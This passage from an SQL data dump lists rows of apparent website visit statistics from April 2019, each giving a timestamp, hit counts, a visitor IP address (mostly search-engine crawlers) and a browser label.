66.249.66.130','chrome'),(409907,1554457197,1,1,0,0,'66.249.66.218','chrome'),(409908,1554457301,1,1,0,0,'54.36.149.101','other'),(409909,1554457423,1,1,0,0,'40.77.167.138','other'),(409910,1554457466,1,1,0,0,'5.196.92.91','firefox'),(409911,1554457675,1,1,0,0,'54.36.148.146','other'),(409912,1554457983,1,1,0,0,'91.196.121.13','chrome'),(409913,1554458224,1,1,0,0,'54.36.148.65','other'),(409914,1554458671,1,1,0,0,'46.229.168.134','other'),(409915,1554458733,2,2,0,0,'66.249.66.218','chrome'),(409916,1554458746,1,1,0,0,'66.249.66.81','chrome'),(409917,1554458752,1,1,0,0,'91.196.178.135','chrome'),(409918,1554458940,1,1,0,0,'54.36.148.236','other'),(409919,1554458998,1,1,0,0,'54.36.150.119','other'),(409920,1554459232,1,1,0,0,'46.229.168.150','other'),(409921,1554459296,1,1,0,0,'157.55.39.81','other'),(409922,1554459345,1,1,0,0,'40.77.167.138','other'),(409923,1554459353,1,1,0,0,'46.229.168.136','other'),(409924,1554459425,1,1,0,0,'178.154.171.27','other'),(409925,1554459499,1,1,0,0,'54.36.149.102','other'),(409926,1554459620,1,1,0,0,'54.36.149.54','other'),(409927,1554459842,1,1,0,0,'5.45.207.79','other'),(409928,1554459906,1,1,0,0,'141.8.142.103','other'),(409929,1554459974,1,1,0,0,'95.163.255.94','other'),(409930,1554460317,1,1,0,0,'54.36.150.9','other'),(409931,1554460392,1,1,0,0,'66.249.66.128','chrome'),(409932,1554460510,1,1,0,0,'40.77.167.6','other'),(409933,1554460899,1,1,0,0,'157.55.39.209','other'),(409934,1554460949,1,1,0,0,'8.29.198.27','other'),(409935,1554461007,1,1,0,0,'66.249.66.130','chrome'),(409936,1554461418,1,1,0,0,'54.36.148.82','other'),(409937,1554461542,1,1,0,0,'8.29.198.25','other'),(409938,1554461798,1,1,0,0,'94.179.147.130','chrome'),(409939,1554461868,1,1,0,0,'54.36.150.145','other'),(409940,1554462248,1,1,0,0,'66.249.66.220','chrome'),(409941,1554462261,1,1,0,0,'54.36.148.110','other'),(409942,1554462297,1,1,0,0,'46.229.168.137','other'),(409943,1554462367,1,1,0,0,'66.249.66.82','chrome'),(409944,1554462548,1,1,0,0,'95.163.255.161','other'),(409945,1554462551,1,1,0,0,'95.163.255.187','other'),(409946,1554462612,1,1,0,0,'66.249.66.218','chrome'),(409947,1554462691,1,1,0,0,'66.249.66.81','chrome'),(409948,1554462814,1,1,0,0,'54.36.149.84','other'),(409949,1554463083,1,1,0,0,'54.36.148.163','other'),(409950,1554463234,1,1,0,0,'46.229.168.130','other'),(409951,1554463296,1,1,0,0,'54.36.149.58','other'),(409952,1554463320,1,1,0,0,'66.249.66.83','chrome'),(409953,1554463321,1,1,0,0,'54.36.150.2','other'),(409954,1554463477,1,1,0,0,'54.36.150.81','other'),(409955,1554463675,1,1,0,0,'46.229.168.154','other'),(409956,1554463687,1,1,0,0,'46.229.168.151','other'),(409957,1554463813,2,2,0,0,'66.249.66.222','chrome'),(409958,1554463883,1,1,0,0,'91.196.178.186','chrome'),(409959,1554463908,1,1,0,0,'66.249.66.220','chrome'),(409960,1554464030,1,1,0,0,'66.249.66.218','chrome'),(409961,1554464035,1,1,0,0,'54.36.149.46','other'),(409962,1554464081,1,1,0,0,'66.249.66.81','chrome'),(409963,1554464213,1,1,0,0,'95.163.255.92','other'),(409964,1554464258,1,1,0,0,'207.46.13.48','other'),(409965,1554464356,1,1,0,0,'46.229.168.137','other'),(409966,1554464386,1,1,0,0,'54.36.148.96','other'),(409967,1554464632,1,1,0,0,'54.36.148.129','other'),(409968,1554464904,1,1,0,0,'54.36.150.24','other'),(409969,1554464933,1,1,0,0,'46.229.168.140','other'),(409970,1554465024,1,1,0,0,'157.55.39.209','other'),(409971,1554465374,2,2,0,0,'66.249.66.81','chrome'),(409972,1554465447,1,1,0,0,'66.249.66.220','chrome'),(409973,1554465554,1,1,0,0,'54.36.149.93','other'),(409974,1554465655,1,1,0,0,'54.36.150.34','other'),(409975,1554465818,1,1,0,0,'207.46.13.48','other'),(409976,1554465885,1,1,0,0,'54.36.150.54','other'),(409977,1554465902,1,1,0,0,'157.55.39.81','other'),(409978,1554466056,1,1,0,0,'66.249.66.218','chrome'),(409979,1554466476,1,1,0,0,'213.180.203.17','other'),(409980,1554466806,1,1,0,0,'54.36.148.38','other'),(409981,1554466837,1,1,0,0,'95.163.255.178','other'),(409982,1554467070,1,1,0,0,'5.255.253.38','other'),(409983,1554467282,1,1,0,0,'54.36.148.68','other'),(409984,1554467326,1,1,0,0,'54.36.149.103','other'),(409985,1554467387,1,1,0,0,'91.124.182.170','firefox'),(409986,1554467407,1,1,0,0,'54.36.148.4','other'),(409987,1554467437,1,1,0,0,'54.36.148.31','other'),(409988,1554467634,3,2,1,0,'66.249.66.218',''),(409989,1554467887,2,2,0,0,'66.249.66.220','chrome'),(409990,1554467909,1,1,0,0,'54.36.148.246','other'),(409991,1554467941,1,1,0,0,'91.196.177.15','chrome'),(409992,1554468254,1,1,0,0,'66.249.66.128','chrome'),(409993,1554468255,1,1,0,0,'54.36.149.8','other'),(409994,1554468256,2,2,0,0,'54.36.148.255','other'),(409995,1554468874,1,1,0,0,'46.229.168.138','other'),(409996,1554469031,1,1,0,0,'54.36.150.124','other'),(409997,1554469142,1,1,0,0,'66.249.66.82','chrome'),(409998,1554469350,1,1,0,0,'54.36.150.145','other'),(409999,1554469440,2,2,0,0,'66.249.66.83','chrome'),(410000,1554469579,1,1,0,0,'54.36.150.80','other'),(410001,1554469642,1,1,0,0,'46.229.168.153','other'),(410002,1554469708,1,1,0,0,'54.36.148.26','other'),(410003,1554469971,1,1,0,0,'66.249.66.81','chrome'),(410004,1554470145,1,1,0,0,'157.55.39.61','other'),(410005,1554470197,1,1,0,0,'95.163.255.93','other'),(410006,1554470255,2,2,0,0,'46.229.168.143','other'),(410007,1554470308,1,1,0,0,'54.36.150.75','other'),(410008,1554470324,1,1,0,0,'157.55.39.202','other'),(410009,1554470513,1,1,0,0,'54.36.150.66','other'),(410010,1554470794,1,1,0,0,'54.36.150.29','other'),(410011,1554470908,1,1,0,0,'66.249.66.222','chrome'),(410012,1554470916,1,1,0,0,'54.36.148.191','other'),(410013,1554471445,1,1,0,0,'54.36.149.62','other'),(410014,1554471635,1,1,0,0,'54.36.148.162','other'),(410015,1554471785,1,1,0,0,'8.29.198.27','other'),(410016,1554471814,1,1,0,0,'54.36.150.66','other'),(410017,1554471943,2,2,0,0,'66.249.66.218','chrome'),(410018,1554472252,1,1,0,0,'54.36.148.241','other'),(410019,1554472394,1,1,0,0,'8.29.198.26','other'),(410020,1554472480,1,1,0,0,'54.36.148.47','other'),(410021,1554472677,1,1,0,0,'46.229.168.140','other'),(410022,1554472852,1,1,0,0,'54.36.150.2','other'),(410023,1554472923,1,1,0,0,'54.36.148.143','other'),(410024,1554473089,1,1,0,0,'66.249.66.132','chrome'),(410025,1554473220,1,1,0,0,'66.249.66.220','chrome'),(410026,1554473521,1,1,0,0,'66.249.66.222','chrome'),(410027,1554473619,1,1,0,0,'54.36.148.30','other'),(410028,1554473710,1,1,0,0,'54.36.149.52','other'),(410029,1554474004,1,1,0,0,'54.36.148.76','other'),(410030,1554474100,2,2,0,0,'87.250.224.81','other'),(410031,1554474105,1,1,0,0,'157.55.39.12','other'),(410032,1554474352,1,1,0,0,'54.36.148.78','other'),(410033,1554474469,1,1,0,0,'66.249.66.128','chrome'),(410034,1554474471,1,1,0,0,'93.73.173.105','chrome'),(410035,1554474630,2,2,0,0,'66.249.66.218','chrome'),(410036,1554474726,2,2,0,0,'157.55.39.182','other'),(410037,1554474759,1,1,0,0,'54.36.149.1','other'),(410038,1554474778,1,1,0,0,'54.36.148.137','other'),(410039,1554474792,1,1,0,0,'141.8.142.144','other'),(410040,1554474796,3,3,0,0,'66.249.66.220','chrome'),(410041,1554474876,1,1,0,0,'54.36.148.206','other'),(410042,1554475246,1,1,0,0,'87.250.224.64','other'),(410043,1554475270,1,1,0,0,'178.154.171.69','other'),(410044,1554475338,1,1,0,0,'46.229.168.129','other'),(410045,1554475395,1,1,0,0,'66.249.66.222','chrome'),(410046,1554475504,1,1,0,0,'54.36.149.86','other'),(410047,1554475651,1,1,0,0,'5.45.207.8','other'),(410048,1554475680,1,1,0,0,'95.163.255.92','other'),(410049,1554475708,1,1,0,0,'95.163.255.98','other'),(410050,1554475742,1,1,0,0,'46.229.168.138','other'),(410051,1554475797,1,1,0,0,'54.36.148.154','other'),(410052,1554475915,1,1,0,0,'157.55.39.12','other'),(410053,1554476444,3,3,0,0,'66.249.66.218','chrome'),(410054,1554476748,1,1,0,0,'46.242.32.245','msie'),(410055,1554477104,1,1,0,0,'66.249.66.222','chrome'),(410056,1554477278,1,1,0,0,'54.36.150.26','other'),(410057,1554477835,1,1,0,0,'66.249.66.132','chrome'),(410058,1554477893,1,1,0,0,'54.36.149.73','other'),(410059,1554477986,1,1,0,0,'157.55.39.12','other'),(410060,1554478021,1,1,0,0,'95.163.255.92','other'),(410061,1554478029,1,1,0,0,'46.229.168.133','other'),(410062,1554478141,1,1,0,0,'66.249.66.222','chrome'),(410063,1554479078,1,1,0,0,'54.36.150.143','other'),(410064,1554480323,1,1,0,0,'54.36.150.4','other'),(410065,1554480494,1,1,0,0,'54.36.150.140','other'),(410066,1554481397,1,1,0,0,'54.36.149.45','other'),(410067,1554481736,1,1,0,0,'95.163.255.92','other'),(410068,1554482101,1,1,0,0,'66.249.66.130','chrome'),(410069,1554482199,1,1,0,0,'46.211.124.66','chrome'),(410070,1554482205,1,1,0,0,'66.249.66.222','chrome'),(410071,1554482320,1,1,0,0,'54.36.150.21','other'),(410072,1554482363,1,1,0,0,'66.249.66.218','chrome'),(410073,1554482488,1,1,0,0,'54.36.148.53','other'),(410074,1554482501,1,1,0,0,'66.249.66.220','chrome'),(410075,1554482612,1,1,0,0,'8.29.198.26','other'),(410076,1554482676,1,1,0,0,'66.249.66.132','chrome'),(410077,1554482868,1,1,0,0,'5.45.207.19','other'),(410078,1554482970,3,3,0,0,'5.45.207.79','other'),(410079,1554482972,1,1,0,0,'157.55.39.182','other'),(410080,1554483006,4,4,0,0,'178.154.244.11','other'),(410081,1554483214,1,1,0,0,'37.9.113.148','other'),(410082,1554483238,1,1,0,0,'8.29.198.27','other'),(410083,1554483411,1,1,0,0,'54.36.148.151','other'),(410084,1554483606,1,1,0,0,'87.250.224.47','other'),(410085,1554483647,1,1,0,0,'141.8.142.103','other'),(410086,1554483833,1,1,0,0,'54.36.148.207','other'),(410087,1554484086,2,2,0,0,'66.249.66.218','chrome'),(410088,1554484095,1,1,0,0,'46.229.168.134','other'),(410089,1554484225,1,1,0,0,'46.229.168.149','other'),(410090,1554484294,1,1,0,0,'66.249.66.222','chrome'),(410091,1554484353,1,1,0,0,'66.249.66.220','chrome'),(410092,1554484359,1,1,0,0,'46.211.124.66','chrome'),(410093,1554484465,1,1,0,0,'54.36.148.84','other'),(410094,1554484571,1,1,0,0,'54.36.148.155','other'),(410095,1554484696,1,1,0,0,'54.36.150.85','other'),(410096,1554484858,1,1,0,0,'5.45.207.19','other'),(410097,1554484893,1,1,0,0,'46.229.168.141','other'),(410098,1554484913,1,1,0,0,'54.36.148.151','other'),(410099,1554485125,1,1,0,0,'54.36.148.67','other'),(410100,1554485150,2,2,0,0,'66.249.66.130','chrome'),(410101,1554485477,1,1,0,0,'46.229.168.162','other'),(410102,1554485479,1,1,0,0,'54.36.148.253','other'),(410103,1554485520,1,1,0,0,'54.36.150.67','other'),(410104,1554485555,1,1,0,0,'66.249.66.222','chrome'),(410105,1554485730,2,2,0,0,'66.249.66.220','chrome'),(410106,1554485791,1,1,0,0,'157.55.39.172','other'),(410107,1554486344,2,2,0,0,'66.249.66.132','chrome'),(410108,1554486603,1,1,0,0,'54.36.150.88','other'),(410109,1554486713,1,1,0,0,'46.229.168.139','other'),(410110,1554487233,1,1,0,0,'54.36.150.54','other'),(410111,1554487395,1,1,0,0,'95.163.255.98','other'),(410112,1554487594,1,1,0,0,'54.36.148.176','other'),(410113,1554487651,1,1,0,0,'95.163.255.96','other'),(410114,1554487670,1,1,0,0,'46.229.168.145','other'),(410115,1554487755,1,1,0,0,'46.229.168.141','other'),(410116,1554488137,1,1,0,0,'54.36.149.93','other'),(410117,1554488268,1,1,0,0,'46.229.168.149','other'),(410118,1554488319,1,1,0,0,'66.249.66.222','chrome'),(410119,1554488677,1,1,0,0,'54.36.150.130','other'),(410120,1554488782,1,1,0,0,'54.36.148.14','other'),(410121,1554488985,1,1,0,0,'54.36.148.63','other'),(410122,1554488988,1,1,0,0,'54.36.150.17','other'),(410123,1554489034,1,1,0,0,'157.55.39.172','other'),(410124,1554489258,1,1,0,0,'46.229.168.147','other'),(410125,1554489342,1,1,0,0,'46.229.168.129','other'),(410126,1554489359,1,1,0,0,'54.36.150.3','other'),(410127,1554489404,1,1,0,0,'207.46.13.67','other'),(410128,1554489443,1,1,0,0,'54.36.148.204','other'),(410129,1554489648,1,1,0,0,'95.163.255.96','other'),(410130,1554490094,1,1,0,0,'95.163.255.170','other'),(410131,1554490151,1,1,0,0,'157.55.39.172','other'),(410132,1554490255,2,2,0,0,'66.249.66.132','chrome'),(410133,1554490264,1,1,0,0,'66.249.66.130','chrome'),(410134,1554490874,2,2,0,0,'66.249.66.222','chrome'),(410135,1554490892,3,3,0,0,'66.249.66.218','chrome'),(410136,1554491088,1,1,0,0,'40.77.167.204','other'),(410137,1554491240,1,1,0,0,'54.36.149.63','other'),(410138,1554491340,1,0,1,0,'51.68.152.26',''),(410139,1554491379,1,1,0,0,'66.249.66.220','chrome'),(410140,1554491574,1,1,0,0,'95.108.181.54','other'),(410141,1554491953,1,1,0,0,'193.194.127.253','other'),(410142,1554492011,1,1,0,0,'54.36.149.5','other'),(410143,1554492070,1,1,0,0,'46.229.168.162','other'),(410144,1554492198,1,1,0,0,'5.45.207.19','other'),(410145,1554492245,1,1,0,0,'5.45.207.79','other'),(410146,1554492292,1,1,0,0,'54.36.150.146','other'),(410147,1554492508,2,2,0,0,'66.249.66.220','chrome'),(410148,1554492547,1,1,0,0,'37.9.113.148','other'),(410149,1554492761,1,1,0,0,'66.249.66.218','chrome'),(410150,1554492852,1,1,0,0,'54.36.150.137','other'),(410151,1554493164,1,1,0,0,'141.8.142.103','other'),(410152,1554493266,1,1,0,0,'40.77.167.204','other'),(410153,1554493448,1,1,0,0,'8.29.198.27','other'),(410154,1554493459,1,1,0,0,'54.36.149.50','other'),(410155,1554493474,1,1,0,0,'46.229.168.129','other'),(410156,1554493498,1,1,0,0,'66.249.66.128','chrome'),(410157,1554493611,3,3,0,0,'46.229.168.134','other'),(410158,1554493745,1,1,0,0,'46.229.168.140','other'),(410159,1554493794,1,1,0,0,'66.249.66.130','chrome'),(410160,1554493872,1,1,0,0,'54.36.148.228','other'),(410161,1554494079,1,1,0,0,'8.29.198.25','other'),(410162,1554494097,1,1,0,0,'54.36.149.55','other'),(410163,1554494143,1,1,0,0,'54.36.149.34','other'),(410164,1554494183,1,1,0,0,'54.36.148.80','other'),(410165,1554494193,1,1,0,0,'54.36.150.93','other'),(410166,1554494556,1,1,0,0,'54.36.148.254','other'),(410167,1554495318,1,1,0,0,'40.77.167.204','other'),(410168,1554495332,1,1,0,0,'54.36.150.79','other'),(410169,1554495541,3,3,0,0,'66.249.66.218','chrome'),(410170,1554495655,1,1,0,0,'95.163.255.174','other'),(410171,1554495676,1,1,0,0,'95.163.255.93','other'),(410172,1554495756,1,1,0,0,'54.36.149.13','other'),(410173,1554495904,1,1,0,0,'66.249.66.222','chrome'),(410174,1554496487,1,1,0,0,'66.249.66.128','chrome'),(410175,1554496496,1,1,0,0,'207.46.13.70','other'),(410176,1554497304,1,1,0,0,'54.36.148.5','other'),(410177,1554497487,1,1,0,0,'54.36.149.49','other'),(410178,1554497753,1,1,0,0,'54.36.148.108','other'),(410179,1554497769,2,2,0,0,'157.55.39.162','other'),(410180,1554498369,1,1,0,0,'54.36.150.148','other'),(410181,1554498555,1,1,0,0,'54.36.150.58','other'),(410182,1554498638,1,1,0,0,'66.249.66.218','chrome'),(410183,1554498945,1,1,0,0,'54.36.148.49','other'),(410184,1554499137,1,1,0,0,'54.36.148.220','other'),(410185,1554499264,1,1,0,0,'95.163.255.92','other'),(410186,1554499364,1,1,0,0,'66.249.66.128','chrome'),(410187,1554499869,1,1,0,0,'54.36.150.137','other'),(410188,1554500358,1,1,0,0,'66.249.66.220','chrome'),(410189,1554500612,1,1,0,0,'66.249.66.130','chrome'),(410190,1554500919,1,1,0,0,'54.36.149.23','other'),(410191,1554501298,1,1,0,0,'54.36.150.1','other'),(410192,1554501334,1,1,0,0,'54.36.148.188','other'),(410193,1554501823,1,1,0,0,'207.46.13.70','other'),(410194,1554501835,1,1,0,0,'54.36.149.36','other'),(410195,1554501855,1,1,0,0,'54.36.150.34','other'),(410196,1554501939,1,1,0,0,'54.36.148.17','other'),(410197,1554502236,1,1,0,0,'46.229.168.152','other'),(410198,1554502289,1,1,0,0,'66.249.66.222','chrome'),(410199,1554502998,1,1,0,0,'54.36.150.51','other'),(410200,1554503103,1,1,0,0,'54.36.150.54','other'),(410201,1554503159,1,1,0,0,'46.229.168.144','other'),(410202,1554503306,1,1,0,0,'207.46.13.67','other'),(410203,1554503420,1,1,0,0,'54.36.148.86','other'),(410204,1554503523,1,1,0,0,'66.249.66.218','chrome'),(410205,1554503560,1,1,0,0,'13.66.139.0','other'),(410206,1554503636,1,1,0,0,'5.45.207.79','other'),(410207,1554503693,1,1,0,0,'37.9.113.148','other'),(410208,1554503749,1,1,0,0,'66.249.66.222','chrome'),(410209,1554503830,1,1,0,0,'46.229.168.151','other'),(410210,1554503887,1,1,0,0,'46.229.168.137','other'),(410211,1554504278,1,1,0,0,'8.29.198.25','other'),(410212,1554504712,1,1,0,0,'157.55.39.142','other'),(410213,1554504928,1,1,0,0,'8.29.198.26','other'),(410214,1554504962,1,1,0,0,'54.36.150.96','other'),(410215,1554504972,1,1,0,0,'54.36.148.164','other'),(410216,1554505188,1,1,0,0,'46.229.168.135','other'),(410217,1554505473,1,1,0,0,'193.106.30.98','firefox'),(410218,1554505544,1,1,0,0,'46.229.168.139','other'),(410219,1554505590,1,1,0,0,'54.36.149.31','other'),(410220,1554505613,1,1,0,0,'54.36.150.107','other'),(410221,1554506075,1,1,0,0,'54.36.150.164','other'),(410222,1554506330,1,1,0,0,'54.36.148.127','other'),(410223,1554506464,1,1,0,0,'157.55.39.230','other'),(410224,1554506538,1,1,0,0,'180.76.15.143','other'),(410225,1554506731,1,1,0,0,'5.45.207.79','other'),(410226,1554506780,1,1,0,0,'46.229.168.150','other'),(410227,1554506897,1,1,0,0,'95.163.255.93','other'),(410228,1554507227,1,1,0,0,'54.36.149.63','other'),(410229,1554507563,1,1,0,0,'54.36.150.99','other'),(410230,1554507571,1,1,0,0,'46.229.168.149','other'),(410231,1554508004,1,1,0,0,'207.46.13.67','other'),(410232,1554508402,1,1,0,0,'46.229.168.147','other'),(410233,1554508537,1,1,0,0,'180.76.15.145','other'),(410234,1554508692,1,1,0,0,'66.249.66.222','chrome'),(410235,1554509387,1,1,0,0,'54.36.149.61','other'),(410236,1554509789,1,1,0,0,'54.36.150.19','other'),(410237,1554510557,1,1,0,0,'54.36.150.44','other'),(410238,1554510688,1,1,0,0,'54.36.148.42','other'),(410239,1554510981,1,1,0,0,'66.249.66.130','chrome'),(410240,1554511729,1,1,0,0,'54.36.149.72','other'),(410241,1554511775,1,1,0,0,'54.36.148.75','other'),(410242,1554511975,1,0,1,0,'66.249.66.220',''),(410243,1554511991,1,1,0,0,'54.36.150.107','other'),(410244,1554512172,1,1,0,0,'5.45.207.19','other'),(410245,1554512763,1,1,0,0,'66.249.66.222','chrome'),(410246,1554512774,1,1,0,0,'46.229.168.151','other'),(410247,1554512817,1,1,0,0,'77.232.153.155','chrome'),(410248,1554512830,1,1,0,0,'54.36.150.148','other'),(410249,1554512857,1,1,0,0,'54.36.150.52','other'),(410250,1554513292,1,1,0,0,'54.36.150.22','other'),(410251,1554513413,1,1,0,0,'46.229.168.162','other'),(410252,1554513531,1,1,0,0,'46.229.168.145','other'),(410253,1554513633,1,1,0,0,'54.36.149.61','other'),(410254,1554513947,1,1,0,0,'157.55.39.142','other'),(410255,1554514217,1,1,0,0,'54.36.148.122','other'),(410256,1554514287,1,1,0,0,'46.229.168.152','other'),(410257,1554515125,2,2,0,0,'8.29.198.27','other'),(410258,1554515193,1,1,0,0,'54.36.149.102','other'),(410259,1554515201,1,1,0,0,'54.36.148.38','other'),(410260,1554515218,1,1,0,0,'157.55.39.230','other'),(410261,1554515261,1,1,0,0,'141.8.142.103','other'),(410262,1554515308,2,2,0,0,'178.154.244.11','other'),(410263,1554515401,1,1,0,0,'5.45.207.79','other'),(410264,1554515464,1,1,0,0,'87.250.224.47','other'),(410265,1554515644,1,1,0,0,'5.45.207.19','other'),(410266,1554515646,1,1,0,0,'157.55.39.142','other'),(410267,1554515647,1,1,0,0,'54.36.148.168','other'),(410268,1554515914,1,1,0,0,'54.36.148.232','other'),(410269,1554515986,1,1,0,0,'46.229.168.129','other'),(410270,1554516030,1,1,0,0,'46.229.168.147','other'),(410271,1554516232,1,1,0,0,'54.36.150.30','other'),(410272,1554516551,1,1,0,0,'46.229.168.132','other'),(410273,1554516665,1,1,0,0,'54.36.149.74','other'),(410274,1554517005,1,1,0,0,'54.36.150.64','other'),(410275,1554517027,1,1,0,0,'54.36.148.228','other'),(410276,1554517054,1,1,0,0,'54.36.149.69','other'),(410277,1554517192,1,1,0,0,'54.36.150.4','other'),(410278,1554517497,1,1,0,0,'46.229.168.152','other'),(410279,1554517625,1,1,0,0,'54.36.148.152','other'),(410280,1554517667,1,1,0,0,'54.36.148.225','other'),(410281,1554517816,1,1,0,0,'54.36.149.8','other'),(410282,1554517860,1,1,0,0,'212.90.45.139','firefox'),(410283,1554518079,1,1,0,0,'54.36.148.237','other'),(410284,1554518298,1,1,0,0,'54.36.150.22','other'),(410285,1554518376,1,1,0,0,'54.36.148.148','other'),(410286,1554518572,1,1,0,0,'54.36.148.251','other'),(410287,1554518640,1,1,0,0,'54.36.149.32','other'),(410288,1554518719,1,1,0,0,'54.36.150.173','other'),(410289,1554518779,1,1,0,0,'54.36.149.8','other'),(410290,1554519333,1,1,0,0,'157.55.39.230','other'),(410291,1554519632,1,1,0,0,'109.74.154.72','chrome'),(410292,1554519878,1,1,0,0,'54.36.150.182','other'),(410293,1554519896,1,1,0,0,'46.96.3.71','chrome'),(410294,1554519898,4,4,0,0,'66.249.83.30','chrome'),(410295,1554519906,5,5,0,0,'66.249.83.26','chrome'),(410296,1554519926,1,1,0,0,'54.36.149.91','other'),(410297,1554520145,2,2,0,0,'66.249.83.28','chrome'),(410298,1554520146,1,1,0,0,'66.102.9.60','chrome'),(410299,1554520147,2,2,0,0,'66.102.9.62','chrome'),(410300,1554520575,1,1,0,0,'54.36.148.174','other'),(410301,1554520914,1,1,0,0,'66.249.66.218','chrome'),(410302,1554520942,3,3,0,0,'66.249.66.222','chrome'),(410303,1554521189,1,1,0,0,'54.36.150.15','other'),(410304,1554521251,2,2,0,0,'66.249.66.220','chrome'),(410305,1554522315,2,2,0,0,'66.249.66.222','chrome'),(410306,1554522518,1,1,0,0,'54.36.148.40','other'),(410307,1554523310,1,1,0,0,'66.249.66.218','chrome'),(410308,1554523465,1,1,0,0,'54.36.148.156','other'),(410309,1554523635,1,1,0,0,'66.249.66.222','chrome'),(410310,1554524100,1,1,0,0,'54.36.148.238','other'),(410311,1554524330,1,1,0,0,'66.249.66.128','chrome'),(410312,1554524543,1,1,0,0,'54.36.149.32','other'),(410313,1554524628,1,1,0,0,'66.249.66.82','chrome'),(410314,1554524645,1,1,0,0,'54.36.150.161','other'),(410315,1554524758,1,1,0,0,'46.229.168.136','other'),(410316,1554524766,1,1,0,0,'54.36.148.115','other'),(410317,1554524862,1,1,0,0,'54.36.150.58','other'),(410318,1554524916,1,1,0,0,'5.45.207.79','other'),(410319,1554525016,1,1,0,0,'66.249.66.218','chrome'),(410320,1554525040,1,1,0,0,'54.36.148.178','other'),(410321,1554525123,1,1,0,0,'66.249.66.83','chrome'),(410322,1554525152,2,2,0,0,'5.255.253.25','other'),(410323,1554525179,1,1,0,0,'5.45.207.8','other'),(410324,1554525296,1,1,0,0,'178.154.244.11','other'),(410325,1554525441,1,1,0,0,'178.154.171.27','other'),(410326,1554525602,1,1,0,0,'37.9.113.148','other'),(410327,1554525626,1,1,0,0,'157.55.39.214','other'),(410328,1554525682,1,1,0,0,'54.36.150.186','other'),(410329,1554525910,1,1,0,0,'141.8.132.16','other'),(410330,1554525928,1,1,0,0,'180.76.15.158','other'),(410331,1554525933,1,1,0,0,'5.45.207.19','other'),(410332,1554525936,1,1,0,0,'87.250.224.118','other'),(410333,1554525961,1,1,0,0,'8.29.198.25','other'),(410334,1554526016,1,1,0,0,'54.36.150.133','other'),(410335,1554526058,1,1,0,0,'54.36.150.14','other'),(410336,1554526507,1,1,0,0,'66.249.66.218','chrome'),(410337,1554526605,1,1,0,0,'8.29.198.27','other'),(410338,1554526698,1,1,0,0,'54.36.150.67','other'),(410339,1554526748,1,1,0,0,'46.229.168.140','other'),(410340,1554526798,1,1,0,0,'66.249.66.81','chrome'),(410341,1554526897,1,1,0,0,'54.36.150.41','other'),(410342,1554527169,1,1,0,0,'46.229.168.143','other'),(410343,1554527266,1,1,0,0,'46.229.168.130','other'),(410344,1554527801,1,1,0,0,'54.36.148.184','other'),(410345,1554527969,1,1,0,0,'54.36.148.211','other'),(410346,1554528787,1,1,0,0,'46.229.168.140','other'),(410347,1554528808,1,1,0,0,'54.36.148.239','other'),(410348,1554528865,1,1,0,0,'163.172.66.247','other'),(410349,1554529703,1,1,0,0,'46.229.168.141','other'),(410350,1554529964,1,1,0,0,'66.249.66.220','chrome'),(410351,1554529973,1,1,0,0,'54.36.148.117','other'),(410352,1554530028,2,2,0,0,'34.221.204.149','chrome'),(410353,1554530110,1,1,0,0,'54.36.148.95','other'),(410354,1554530129,1,1,0,0,'180.76.15.21','other'),(410355,1554530628,1,1,0,0,'54.36.149.48','other'),(410356,1554531187,1,1,0,0,'54.36.150.52','other'),(410357,1554531219,1,1,0,0,'157.55.39.214','other'),(410358,1554531541,1,1,0,0,'54.36.149.70','other'),(410359,1554531978,1,1,0,0,'66.249.66.130','chrome'),(410360,1554532540,1,1,0,0,'54.36.150.35','other'),(410361,1554532682,1,1,0,0,'54.36.148.46','other'),(410362,1554532758,1,1,0,0,'54.36.148.112','other'),(410363,1554533591,2,2,0,0,'46.229.168.146','other'),(410364,1554533977,1,1,0,0,'157.55.39.214','other'),(410365,1554533998,1,1,0,0,'40.77.167.68','other'),(410366,1554534207,1,1,0,0,'207.46.13.217','other'),(410367,1554534522,1,1,0,0,'95.28.225.171','msie'),(410368,1554535177,1,1,0,0,'54.36.150.61','other'),(410369,1554535274,1,1,0,0,'54.36.149.34','other'),(410370,1554535321,1,1,0,0,'46.229.168.136','other'),(410371,1554535362,1,1,0,0,'54.36.149.210','other'),(410372,1554535516,1,1,0,0,'46.229.168.130','other'),(410373,1554535719,1,1,0,0,'54.36.148.97','other'),(410374,1554535768,1,1,0,0,'31.184.238.22','chrome'),(410375,1554536071,1,1,0,0,'66.249.66.128','chrome'),(410376,1554536097,1,1,0,0,'54.36.150.29','other'),(410377,1554536238,1,1,0,0,'66.249.66.220','chrome'),(410378,1554536257,1,1,0,0,'54.36.148.147','other'),(410379,1554536643,1,1,0,0,'54.36.150.134','other'),(410380,1554536809,1,1,0,0,'8.29.198.26','other'),(410381,1554536841,1,1,0,0,'54.36.150.38','other'),(410382,1554537051,1,1,0,0,'54.36.149.52','other'),(410383,1554537438,1,1,0,0,'178.154.244.49','other'),(410384,1554537447,1,1,0,0,'8.29.198.25','other'),(410385,1554537695,1,1,0,0,'178.154.244.11','other'),(410386,1554537831,1,1,0,0,'178.154.171.24','other'),(410387,1554538064,1,1,0,0,'54.36.150.75','other'),(410388,1554538189,1,1,0,0,'54.36.148.141','other'),(410389,1554538236,1,1,0,0,'46.229.168.142','other'),(410390,1554538809,1,1,0,0,'207.46.13.1','other'),(410391,1554538986,1,1,0,0,'46.188.31.24','chrome'),(410392,1554539039,1,1,0,0,'54.36.148.67','other'),(410393,1554539167,1,1,0,0,'46.229.168.149','other'),(410394,1554539248,1,1,0,0,'54.36.148.167','other'),(410395,1554539556,1,1,0,0,'66.249.66.220','chrome'),(410396,1554539637,1,1,0,0,'54.36.150.112','other'),(410397,1554539675,1,1,0,0,'54.36.148.233','other'),(410398,1554539707,1,1,0,0,'54.36.149.13','other'),(410399,1554539860,1,1,0,0,'66.249.66.222','chrome'),(410400,1554540003,1,1,0,0,'54.36.148.185','other'),(410401,1554540298,1,1,0,0,'46.229.168.152','other'),(410402,1554540427,1,1,0,0,'54.36.148.227','other'),(410403,1554540915,1,1,0,0,'46.229.168.132','other'),(410404,1554541337,1,1,0,0,'54.36.148.216','other'),(410405,1554541458,1,1,0,0,'66.249.66.220','chrome'),(410406,1554541460,1,1,0,0,'54.36.149.52','other'),(410407,1554541561,1,1,0,0,'66.249.66.81','chrome'),(410408,1554541637,1,1,0,0,'54.36.148.69','other'),(410409,1554541762,1,1,0,0,'66.249.66.218','chrome'),(410410,1554541855,1,1,0,0,'66.249.66.222','chrome'),(410411,1554542314,1,1,0,0,'54.36.150.38','other'),(410412,1554542444,1,1,0,0,'54.36.148.152','other'),(410413,1554542576,1,1,0,0,'54.36.148.78','other'),(410414,1554543087,1,1,0,0,'46.229.168.154','other'),(410415,1554543192,1,1,0,0,'46.229.168.140','